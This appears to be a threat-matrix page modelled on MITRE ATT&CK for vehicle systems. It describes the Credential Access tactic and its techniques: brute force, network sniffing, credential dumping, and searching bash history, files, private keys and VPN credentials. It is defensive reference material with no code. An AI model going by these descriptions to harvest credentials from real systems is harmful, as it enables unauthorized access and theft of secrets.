Credential Access

The adversary is trying to steal account names and passwords.

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

ID: TA0006
Created: 03 December 2023
Last Modified: 03 December 2023

Techniques

Techniques: 4
ID Name Description
T2036 Brute Force Adversaries may use brute force techniques to gain unauthorized access to vehicle systems by repeatedly guessing passwords or password hashes.
T2037 Network Sniffing Adversaries may gain unauthorized access to vehicle systems by using network sniffing technique. This method allows them to capture information about the vehicle's network, including authentication material passed over the network. Network sniffing involves monitoring or capturing information sent over a wired or wireless connection, providing adversaries with valuable data about the vehicle's network activity.
T2038 OS Credential Dumping Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
T2039 Unsecured Credentials Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Bash History), operating system or other specialized files/artifacts (e.g. Private Keys).
.001 Bash History Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials.
.002 Credentials In Files Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
.003 Private Keys Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.
.004 VPN Credential Adversaries may search unsecured VPN credentials to gain unauthorized access to vehicle backend servers. These credentials are intended to protect the backend server and only allow legitimate vehicles to access it. However, if these VPN credentials are not properly secured, adversaries can easily extract them and directly connect to the backend server using without the legitimate vehicles.